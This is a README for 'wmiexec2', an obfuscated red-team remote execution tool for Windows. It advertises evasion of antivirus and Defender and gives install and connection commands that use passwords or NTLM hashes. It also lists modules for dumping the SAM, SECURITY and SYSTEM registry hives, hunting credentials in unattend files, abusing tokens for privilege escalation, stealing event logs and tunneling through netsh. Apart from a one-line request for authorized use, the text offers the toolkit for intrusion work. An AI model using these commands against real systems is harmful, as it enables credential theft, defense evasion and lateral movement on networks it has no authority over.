The stealthy upgrade to everyone's favorite `wmiexec` — obfuscated, enhanced, and red team ready.
💀 Bypass AV. Automate engagements. Dominate.
- 🎭 Obfuscated to evade signature-based AV detection
- 🛠️ Built-in red team modules for rapid automation
- 🐚 Supports `cmd` and `powershell` shell types
- 📁 Local and remote file transfer (`lput`, `lget`)
- 📡 Netsh tunneling, token abuse, VM detection, and more
```bash
git clone https://github.com/ice-wzl/wmiexec2.git
cd wmiexec2/
pip3 install -r requirements.txt
```

⚠️ Do NOT use `wget` on GitHub Raw — it will break emoji characters. Always use `git clone`.
| Environment | Result |
|---|---|
| Windows Server 2022 (Feb 2024 updates) | ✅ All modules working |
| Windows 10 Pro, Defender v1.381.3595.0 | ✅ All modules working |
| Windows 10 Pro, Kaspersky Standard 21.8.5 | ✅ All modules working |
| Windows 8, Defender v1.383.35.0 | ✅ All modules working |
| Windows 7 Pro, Defender v1.95.191.0 (2010) |
```bash
python3 wmiexec2.py DOMAIN/USERNAME:PASSWORD@10.0.0.2 --shell-type powershell
python3 wmiexec2.py WORKGROUP/Administrator:'Password123!@#'@10.0.0.4 --shell-type cmd
```

Supports both password and NTLM hash authentication.
| Command | Description |
|---|---|
| `help` | Show available modules |
| `lcd <path>` | Change local working directory |
| `exit` | Exit shell |
| `lput <src> <dst>` | Upload file to target |
| `lget <file>` | Download file from target |
| `!<command>` | Run a command locally (e.g., `!ls`) |
| `ls [path]` | List target directory (uses `dir /a`) |
| `cat <file>` | Show remote file contents (alias for `type`) |
Display target user, hostname, IP, and architecture.

```
sysinfo
```

Lists common AV product processes via remote enumeration.

```
av
```

Checks Defender installation, service status, exclusions, and tamper protection.

```
defender
```

Detects ESXi, VMware, QEMU, and VirtualBox environments.

```
vmcheck
```

Searches for unattended install config files that may contain credentials.

```
unattend
```

Dumps SAM, SECURITY, and SYSTEM hives (bypasses Defender as of 6/7/24).

```
regrip
```

Download .evtx logs from remote system.

```
loggrab Security.evtx
```

Enumerates active tokens and suggests privesc paths.

```
tokens
```

Run custom recon commands listed in `survey.conf`.

```
survey
survey save
```

```
addtun 10000 10.0.0.5 443
showtun
deltun 10000
```

If you get this error:
```
[-] Can't find a valid stringBinding to connect
```

- Locate your `dcomrt.py`:

  ```bash
  find / -type f -name "dcomrt.py" 2>/dev/null
  ```

- Edit and replace:

  ```python
  # raise Exception("Can't find a valid stringBinding to connect")
  stringBinding = 'ncacn_ip_tcp:%s%s' % (self.get_target(), bindingPort)
  LOG.info("Can't find a valid stringBinding to connect, using default!")
  ```

✅ Done!
- This tool is under active development — submit PRs or issues.
- All modules built for stealth and speed.
- Use responsibly in authorized engagements.
If wmiexec2.0 saved you time or helped your ops:
🧠 Spread the knowledge. 🌍 Share the repo. ⭐ Star it.
ice-wzl
🐙 GitHub: ice-wzl
🛠️ Built with ❤️ for red teams.